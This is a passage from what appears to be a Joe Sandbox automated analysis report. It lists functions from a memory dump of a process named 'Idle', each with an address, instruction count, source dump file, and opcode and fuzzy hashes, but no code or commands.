                                                                                              • Instruction Fuzzy Hash: 84817034A0E64E8FEB65EB68C4686FD7BA1EF19300F0544BAC419D71A2DE74A644CB11
                                                                                              Function 00007FFD9BA905D0 Relevance: .2, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a2b5838a0f86e04be8e6d199fe64a0a7c37a9a01c985b0d45a685db77bd334a
                                                                                              • Instruction ID: ec5baeaf86cad27879beba968101be7b505f295740ddc3dce9dff3089502eaba
                                                                                              • Opcode Fuzzy Hash: 9a2b5838a0f86e04be8e6d199fe64a0a7c37a9a01c985b0d45a685db77bd334a
                                                                                              • Instruction Fuzzy Hash: 13610230B19B4E4FDB58DF5888645BA77E2FFA8304F11417EE45AC72A2DE74A902C780
                                                                                              Function 00007FFD9BA9C258 Relevance: .2, Instructions: 218COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f85a86844368b02a43a3aef1b06ba24415c5abc2439a33153b02a516d29a2909
                                                                                              • Instruction ID: 275cdfd41299460927201fe5ba5fed0f27f913ee75a3d8573b9d303fb715a0bd
                                                                                              • Opcode Fuzzy Hash: f85a86844368b02a43a3aef1b06ba24415c5abc2439a33153b02a516d29a2909
                                                                                              • Instruction Fuzzy Hash: F981A030A0AA4E8FEB55EBA4C4686FD7BF0FF09304F1104BAD41AD71A1DB78A644CB00
                                                                                              Function 00007FFD9BA9BE88 Relevance: .2, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d343a18e43e900e575bbb1ebb7f2ac733b4e7e28777501e25852302e0f86443f
                                                                                              • Instruction ID: df2f02019a8e63cb821d0305d4e5d6ce1a196a9088e4871134908ab93edb7200
                                                                                              • Opcode Fuzzy Hash: d343a18e43e900e575bbb1ebb7f2ac733b4e7e28777501e25852302e0f86443f
                                                                                              • Instruction Fuzzy Hash: 9871A030A0E78E8FDB95DF6488696A93BF0FF06300F4645BBD458C70A2DB789648CB41
                                                                                              Function 00007FFD9BA9A878 Relevance: .2, Instructions: 215COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f844a2839e21fc2ad41a4e28fedc9d24b59ef6e3e927d462eebc17d2a89312c
                                                                                              • Instruction ID: 64a901f7e89cf55f6a3d3ae22569020e03248d7716356c67db1998355cb09d48
                                                                                              • Opcode Fuzzy Hash: 8f844a2839e21fc2ad41a4e28fedc9d24b59ef6e3e927d462eebc17d2a89312c
                                                                                              • Instruction Fuzzy Hash: 9A71A230A0E78E8FDB95DF6488696AA7BF0FF05300F4645BBD458C70A2DB789658CB41
                                                                                              Function 00007FFD9BA9A8B8 Relevance: .2, Instructions: 214COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 562cf9b463a5c3ba693d9def6d89b4a4ac0dbac59867da2081868a4663083f8f
                                                                                              • Instruction ID: 81995620ad3a783b6f837588caee0393157ebd8478bcdb449c1d7cfb2351e4bf
                                                                                              • Opcode Fuzzy Hash: 562cf9b463a5c3ba693d9def6d89b4a4ac0dbac59867da2081868a4663083f8f
                                                                                              • Instruction Fuzzy Hash: BF71E874E1AA1D8FEBA4EBA884656FDB7F1FF58300F41407AD01DD32A2DE746A419B40
                                                                                              Function 00007FFD9BAA66CD Relevance: .2, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a27d81cd307231ca2799f095e456d86c9836c57b8e89ee5191708f3cd5112c6
                                                                                              • Instruction ID: 25aed1390651d3d139ac5ac294584466dd9df2222359936fe4ed9753ffa91fe1
                                                                                              • Opcode Fuzzy Hash: 9a27d81cd307231ca2799f095e456d86c9836c57b8e89ee5191708f3cd5112c6
                                                                                              • Instruction Fuzzy Hash: 4E81A270E0A60D8FEB64DFA8C4646EDBBF2EF19310F01417AD009D72A6DA786644CB51
                                                                                              Function 00007FFD9BA9A7A8 Relevance: .2, Instructions: 209COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b3109c7ac965672da36549121bc08770a0d30942d1d849a94b4b77fa9a8f5519
                                                                                              • Instruction ID: 9a2a05ece4af68aa5053334b1a215350d8fa59111261a6b0837aabb2bde37d9a
                                                                                              • Opcode Fuzzy Hash: b3109c7ac965672da36549121bc08770a0d30942d1d849a94b4b77fa9a8f5519
                                                                                              • Instruction Fuzzy Hash: 4061F430E0990E8FEB98EF58C465AF9B7E1FF58314F1146BAE01DD7196CA75A540CB40
                                                                                              Function 00007FFD9BA90610 Relevance: .2, Instructions: 209COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 45f03fe17fdaed5e21be6f5eff8003f6f94000edc266eea88bdf71a30a755e05
                                                                                              • Instruction ID: 77e15113d47ee8aba107d0619a6a65bbdca68c4bdf7fc0d05e690c746bed0bd1
                                                                                              • Opcode Fuzzy Hash: 45f03fe17fdaed5e21be6f5eff8003f6f94000edc266eea88bdf71a30a755e05
                                                                                              • Instruction Fuzzy Hash: 04612B3160921A8FD719FFBCE8648E937B0EF55329B0586B7E089CA0E7DE38A145C751
                                                                                              Function 00007FFD9BAA1C18 Relevance: .2, Instructions: 207COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c4f2f157abbbe6fa5fe33cbc35540c810c586a5db04965c1041e037a4fbacc1
                                                                                              • Instruction ID: b04e3df28e61ec138f693bb34d45034d4b20d713ada9c8ecdc12741354b040ab
                                                                                              • Opcode Fuzzy Hash: 3c4f2f157abbbe6fa5fe33cbc35540c810c586a5db04965c1041e037a4fbacc1
                                                                                              • Instruction Fuzzy Hash: 26716C30E0A24E9FDB649FA4C8652EE7BF1FF25310F01457AE419D22A1DA78A644CB91
                                                                                              Function 00007FFD9BAA4248 Relevance: .2, Instructions: 207COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42282f6032cf51101e7771531fb93f748b4f08c898250e321e3e2402784b72e8
                                                                                              • Instruction ID: d5af0c6041cce7b8801d23e517ad4d931c2280ec66470e81a757d65dbbd6aad9
                                                                                              • Opcode Fuzzy Hash: 42282f6032cf51101e7771531fb93f748b4f08c898250e321e3e2402784b72e8
                                                                                              • Instruction Fuzzy Hash: CB61D531A0E78E8FE7A59B6488352B97FE1FF15310F0601BEE858C60F3DE6866448751
                                                                                              Function 00007FFD9BAA4A08 Relevance: .2, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 28a771706722cd6ed15f7649a60133e66eee3af3132c4551ada9e9d28fbcc6b8
                                                                                              • Instruction ID: fdab914a574063100ea1a1411715104759fe6b06da49c7f0408a4e657cd64caf
                                                                                              • Opcode Fuzzy Hash: 28a771706722cd6ed15f7649a60133e66eee3af3132c4551ada9e9d28fbcc6b8
                                                                                              • Instruction Fuzzy Hash: 29613971A19A5D8FEFA4EBA888656ADBBB1FF58300F41016AE40DD32A1DE7469418B40
                                                                                              Function 00007FFD9BA9BAAA Relevance: .2, Instructions: 201COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ccd503582c597325f801197a01771c134c98172eee1ec3cda25d058f093ff918
                                                                                              • Instruction ID: c5247520e3fb09395f544acacc54d8bcfc05670144f0fecf7f78516df681f4bb
                                                                                              • Opcode Fuzzy Hash: ccd503582c597325f801197a01771c134c98172eee1ec3cda25d058f093ff918
                                                                                              • Instruction Fuzzy Hash: 3C61F974E1AA5D8FEBA4EBA884657ED7BB1FF58300F41007AD01DD32A2DE746A419B40
                                                                                              Function 00007FFD9BA9A7E8 Relevance: .2, Instructions: 192COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2cba3473720544771dbaeed873b17770ada7c78cd1fa0940f19a55f99a3c280e
                                                                                              • Instruction ID: dc5e3ae2c6f806295406f3a306f68634efd1530b4e3939d2274cec0d890a19b8
                                                                                              • Opcode Fuzzy Hash: 2cba3473720544771dbaeed873b17770ada7c78cd1fa0940f19a55f99a3c280e
                                                                                              • Instruction Fuzzy Hash: D1613970E1991D8EEBA4EBA8C4647EDB7F1FF58300F41407AD01DE32A1DE786A419B40
                                                                                              Function 00007FFD9BAA4A80 Relevance: .2, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 744ce05cd6fcd2c0febfc5ea08f21ac5a3c85e962f9b8802b15b5b6bde9d6f87
                                                                                              • Instruction ID: a560e4266d4a29825c4509ccad302da5bc4a1ac3e6f528fd687b6f2e7f629a55
                                                                                              • Opcode Fuzzy Hash: 744ce05cd6fcd2c0febfc5ea08f21ac5a3c85e962f9b8802b15b5b6bde9d6f87
                                                                                              • Instruction Fuzzy Hash: 53511B71E1991D8FDFA4EBA8C895BADB7F1FF58301F41016AE00DE32A5DE7469418B40
                                                                                              Function 00007FFD9BA9BF10 Relevance: .2, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a18b075189b73e24873d03577be3d58ece3c98c5cb587bce89ea41f2e84d5105
                                                                                              • Instruction ID: 4293169311b3da5206a68e3a4145dde27a95e2525df9f43849ddc65574c2b090
                                                                                              • Opcode Fuzzy Hash: a18b075189b73e24873d03577be3d58ece3c98c5cb587bce89ea41f2e84d5105
                                                                                              • Instruction Fuzzy Hash: FB61A23090EB8E8FDB95EF6488695A97BF0FF15300F0645BBD459C70A2DB789648CB41
                                                                                              Function 00007FFD9BA9B5D8 Relevance: .2, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6cf1414154474a4eff122b088cff15c8c6fc123422f496bc4c4173518e65c47d
                                                                                              • Instruction ID: bcb84bb84f587e51605fd82c3732137de904a50544c45334b6cc0bebca294c9b
                                                                                              • Opcode Fuzzy Hash: 6cf1414154474a4eff122b088cff15c8c6fc123422f496bc4c4173518e65c47d
                                                                                              • Instruction Fuzzy Hash: 79614A30E1A64E8FEB65DFA888646ED7BF0FF09300F41457AD409D61A1DBB8AA44DB41
                                                                                              Function 00007FFD9BAA1F33 Relevance: .2, Instructions: 186COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1fd90cf8188c869007545fd4acac22466b3103f0c73c9e2794dca3d1098dcf7
                                                                                              • Instruction ID: 7cb095c1387aa2ef43af23efe212e74ade6540df7caa38828377065654ee0d22
                                                                                              • Opcode Fuzzy Hash: e1fd90cf8188c869007545fd4acac22466b3103f0c73c9e2794dca3d1098dcf7
                                                                                              • Instruction Fuzzy Hash: 9761BD30E1964E8FDB58EFA4C8656EDBBB1FF19305F0101BAE409D71A2CA786945CB41
                                                                                              Function 00007FFD9BA9A815 Relevance: .2, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03dc763ffb0e51b8f931547e6419c46b8d50d0d4738de1685f00d226ef422360
                                                                                              • Instruction ID: d619d883abc82f4953bc3066488e9388f35c3a0a4bab16f5e601c0c30f076962
                                                                                              • Opcode Fuzzy Hash: 03dc763ffb0e51b8f931547e6419c46b8d50d0d4738de1685f00d226ef422360
                                                                                              • Instruction Fuzzy Hash: F4512F74E1A51D8EEBA4EBA8C4657FDB7B1FF58300F41007AD05DD3292DE7869429B40
                                                                                              Function 00007FFD9BAECEC8 Relevance: .2, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75a5b5b2073663c07777259f5afb3cc678ed09c123b7ca9734901dcc8229d174
                                                                                              • Instruction ID: a458e2494ce24b2c30ce8f51118607a1ab55a430c61f39ac5441e42957d6febf
                                                                                              • Opcode Fuzzy Hash: 75a5b5b2073663c07777259f5afb3cc678ed09c123b7ca9734901dcc8229d174
                                                                                              • Instruction Fuzzy Hash: E151A135E19A0E8FEFA8DBA8C8616FD7BB1FF58300F51017AE00AD31A5DB7569418B40
                                                                                              Function 00007FFD9BA9280D Relevance: .2, Instructions: 184COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 732ef26a9d92032b4d8400b70b0c73c264b72c757aa677d71e57640741e5f73d
                                                                                              • Instruction ID: 0084fcea252a39e51e546616fb9c99d18e8c1bbe36bd2c3e1d40a29c9b290ac7
                                                                                              • Opcode Fuzzy Hash: 732ef26a9d92032b4d8400b70b0c73c264b72c757aa677d71e57640741e5f73d
                                                                                              • Instruction Fuzzy Hash: 57512B3260D3564FD315FBBCE8658E937A0EF5532AB0586B7E488CE0D7DE289049C751
                                                                                              Function 00007FFD9BA9CE88 Relevance: .2, Instructions: 184COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6f9d68cb49b4a953822d4fbff410caadd8fd16717969fa4f058ee5b8884c8f4
                                                                                              • Instruction ID: 61ad76c02f4bbcd106988a252a61e859a706e9f1508c8183c45f42bd1b89f7b5
                                                                                              • Opcode Fuzzy Hash: a6f9d68cb49b4a953822d4fbff410caadd8fd16717969fa4f058ee5b8884c8f4
                                                                                              • Instruction Fuzzy Hash: 6861803090E78E8FEB569B6488242F97FB0EF06310F0601BBD859D61E2EA785658D741
                                                                                              Function 00007FFD9BA9BF90 Relevance: .2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3eb05ae62a1a18dd3b465308384e2ba7315084ce75ba393a4022aa2ee57cbb06
                                                                                              • Instruction ID: cd4553f7f325140896f2decf9cb4bb36d3ca304adef46aa1aa69f5ff455e2203
                                                                                              • Opcode Fuzzy Hash: 3eb05ae62a1a18dd3b465308384e2ba7315084ce75ba393a4022aa2ee57cbb06
                                                                                              • Instruction Fuzzy Hash: 2C518430A09A8E8FDB95EF68C8695B97BF0FF19300F0145BBD419C71A6DB78A644CB41
                                                                                              Function 00007FFD9BA9A69D Relevance: .2, Instructions: 178COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 342b484cb5050baff03ec8b1dcf397851ca8325945b99db0f716a75c58c14d3d
                                                                                              • Instruction ID: db373a62ab6ba3a0457d205942a9569b3e83b9aabf114128302dd48ebc8e76fc
                                                                                              • Opcode Fuzzy Hash: 342b484cb5050baff03ec8b1dcf397851ca8325945b99db0f716a75c58c14d3d
                                                                                              • Instruction Fuzzy Hash: 24519230A0E78E8FEBA59F6488252FA7BB1FF15704F01057AD44DC71A2DBB86554CB41
                                                                                              Function 00007FFD9BAA0610 Relevance: .2, Instructions: 178COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f8c7577176fc9e80b90e8c093d3203b28769204218c1760799a5ac643c1ffee
                                                                                              • Instruction ID: 23640279f857222b8c35bd9c748a98594d124c4e6f0c675922b85baa5c64114c
                                                                                              • Opcode Fuzzy Hash: 1f8c7577176fc9e80b90e8c093d3203b28769204218c1760799a5ac643c1ffee
                                                                                              • Instruction Fuzzy Hash: 5751AC30A0A68E8FDBA5EF64C8696F97BB1FF19304F0144BAD419C71A2CA74A544CB41
                                                                                              Function 00007FFD9BA9BF08 Relevance: .2, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35d4884b3bf6ee120491bc321ae4b9ce121a0de34fe84f02fe06b11ee2461bbb
                                                                                              • Instruction ID: d2acc46c381338a040fd872459544965e713a42bbdc3c25995fe7781e5565eca
                                                                                              • Opcode Fuzzy Hash: 35d4884b3bf6ee120491bc321ae4b9ce121a0de34fe84f02fe06b11ee2461bbb
                                                                                              • Instruction Fuzzy Hash: 8351703090E78E8FDB96EF6488695A97FF0FF16300F0645BBD458C70A2DA789648CB41
                                                                                              Function 00007FFD9BAA0609 Relevance: .2, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c106d1d47b4da83637254466f7f2be6ce28eee77202c6c140a71840d41a6229
                                                                                              • Instruction ID: 1916b26b2fd86d0c1d4157e45dd5f3fbc6e2cf2a7f521bc40616ce50515609c7
                                                                                              • Opcode Fuzzy Hash: 7c106d1d47b4da83637254466f7f2be6ce28eee77202c6c140a71840d41a6229
                                                                                              • Instruction Fuzzy Hash: 6651923090E78E8FDBA59F6488292F97BB1FF15700F0105BAD85CC71A2DBB86654CB41
                                                                                              Function 00007FFD9BA9C2FB Relevance: .2, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 617f3d812468a9d5eb0838b834a81dc7cd863e0635b8fa3c1acae050e8b9252d
                                                                                              • Instruction ID: e9fe9484a3a86f5c3e4ebffc0c11cdbfc5ff92d2a4755f41a0a26d020bbace95
                                                                                              • Opcode Fuzzy Hash: 617f3d812468a9d5eb0838b834a81dc7cd863e0635b8fa3c1acae050e8b9252d
                                                                                              • Instruction Fuzzy Hash: 09511631F0EA4E8FEB25ABA898246FD77A0FF15325F01017BD419C60E2EE6C6648D750
                                                                                              Function 00007FFD9BAA5800 Relevance: .2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e00efb45c53e6cff604b8aba7f63178addf9636ada055b2caaad1d77651a12c7
                                                                                              • Instruction ID: 423d705017b8929db29fae7322b96d6bc433661bb73e5c5ba144f8292db80e88
                                                                                              • Opcode Fuzzy Hash: e00efb45c53e6cff604b8aba7f63178addf9636ada055b2caaad1d77651a12c7
                                                                                              • Instruction Fuzzy Hash: 91618030E0E64D8FEB649BA488697BDB7B1FF09310F0141BAD44DD21A2DF786A44DB15
                                                                                              Function 00007FFD9BA9A868 Relevance: .2, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f6d4048d647de38b5a72562b72389c4579e50d4bbc9caff0d2474d1a4865cca2
                                                                                              • Instruction ID: 7763f03abbfbd10d0d6f89ec3e7d661bf281af26b3babcce16b9b2c6010357d7
                                                                                              • Opcode Fuzzy Hash: f6d4048d647de38b5a72562b72389c4579e50d4bbc9caff0d2474d1a4865cca2
                                                                                              • Instruction Fuzzy Hash: FF513D30E1964E8FDB98DF98C8A4ABDBBF2FF58300F51057AD00AD72A5DA746941CB50
